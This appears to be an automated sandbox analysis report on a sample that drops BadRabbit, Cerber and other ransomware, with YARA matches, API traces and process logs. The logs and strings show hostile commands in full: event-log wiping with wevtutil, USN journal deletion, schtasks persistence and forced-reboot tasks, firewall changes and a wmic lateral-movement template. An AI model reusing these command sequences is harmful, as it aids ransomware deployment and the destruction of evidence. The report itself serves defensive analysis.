Source: 47.2.rundll32.exe.5c4e70.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 47.2.rundll32.exe.5c4e70.0.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.rundll32.exe.444ff8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.rundll32.exe.444ff8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: 00000028.00000000.314208666.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 00000028.00000000.312282421.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
Source: 0000003A.00000000.343212020.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 00000013.00000002.412053021.0000000001720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 0000003A.00000000.345008675.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 0000003A.00000000.339887192.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 00000028.00000002.329104231.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 0000001B.00000000.303576856.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
Source: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 0000001B.00000000.302953795.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
Source: 00000028.00000000.312879365.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 00000028.00000000.311585156.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 00000013.00000002.459335598.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 0000003A.00000002.357179404.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 00000013.00000000.299020841.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 0000003A.00000002.352110846.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 00000013.00000000.301994770.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 0000003A.00000002.357976764.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 00000013.00000000.299998392.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 0000003A.00000000.341491369.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
Source: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 00000013.00000000.303477710.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 0000001B.00000000.303401011.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
Source: 00000028.00000002.331419258.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: Process Memory Space: rundll32.exe PID: 5364, type: MEMORYSTR	Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, type: DROPPED	Matched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
Source: C:\Windows\cscc.dat, type: DROPPED	Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, type: DROPPED	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Windows\dispci.exe, type: DROPPED	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Windows\dispci.exe, type: DROPPED	Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, type: DROPPED	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: C:\Users\user\AppData\Local\Temp\Fantom.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\infpub.dat

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B8A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,

3_2_007B8A23

Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe

File created: C:\Windows\infpub.dat

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Code function: String function: 0040B654 appears 42 times

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00406471 NtdllDefWindowProc_W,	19_2_00406471
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B8D1 NtQueryVirtualMemory,	19_2_0040B8D1
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00404DE4 SearchPathW,RtlDosPathNameToNtPathName_U,NtDeleteFile,RtlFreeAnsiString,	19_2_00404DE4
Source: C:\Windows\5753.tmp	Code function: 27_2_00007FF7CEF2214C GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,	27_2_00007FF7CEF2214C
Source: C:\Windows\5753.tmp	Code function: 27_2_00007FF7CEF21864 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree,	27_2_00007FF7CEF21864
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00406471 NtdllDefWindowProc_W,	40_2_00406471
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B8D1 NtQueryVirtualMemory,	40_2_0040B8D1
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00404DE4 SearchPathW,RtlDosPathNameToNtPathName_U,NtDeleteFile,RtlFreeAnsiString,	40_2_00404DE4

Source: irH9zMhZub.exe, 00000000.00000000.247141529.00000201CEFF8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamed.exe$ vs irH9zMhZub.exe
Source: irH9zMhZub.exe	Binary or memory string: OriginalFilenamed.exe$ vs irH9zMhZub.exe

Source: C:\Windows\SysWOW64\wevtutil.exe

Process token adjusted: Security

Source: irH9zMhZub.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Endermanch@NoMoreRansom.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Fantom.exe.0.dr

Static PE information: Section: .rsrc ZLIB complexity 0.9916272410358565

Source: irH9zMhZub.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\irH9zMhZub.exe

File created: C:\Users\user\Desktop\BadRabbit.zip

Jump to behavior

Source: cscc.dat.3.dr

Binary string: configFlags\Device\dcrypt\DosDevices\dcryptdump_hiber_%s\$dcsys$$dcsys$\Device\CdRom%s\$DC_TRIM_%x$$dcsys$_fail_%xNTFSFATFAT32exFATRSDS

Source: classification engine

Classification label: mal100.rans.spre.troj.expl.evad.winEXE@123/23@2/100

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		3_2_007B1368
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,		3_2_007B9534

Source: C:\Users\user\Desktop\irH9zMhZub.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_007B9534

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B8313 FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,

3_2_007B8313

Source: rundll32.exe, 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.299402588.000000000422D000.00000002.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.337976716.000000000420D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
Source: rundll32.exe, 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, dispci.exe.3.dr	Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK

Source: irH9zMhZub.exe	ReversingLabs: Detection: 66%
Source: irH9zMhZub.exe	Virustotal: Detection: 63%
Source: irH9zMhZub.exe	Metadefender: Detection: 27%

Source: C:\Users\user\Desktop\irH9zMhZub.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\irH9zMhZub.exe "C:\Users\user\Desktop\irH9zMhZub.exe"
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\5753.tmp "C:\Windows\5753.tmp" \\.\pipe\{BA7DC5E0-29E5-4FCA-A986-C2C71FD14928}
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
Source: C:\Windows\5753.tmp	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1446829312 && exit
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
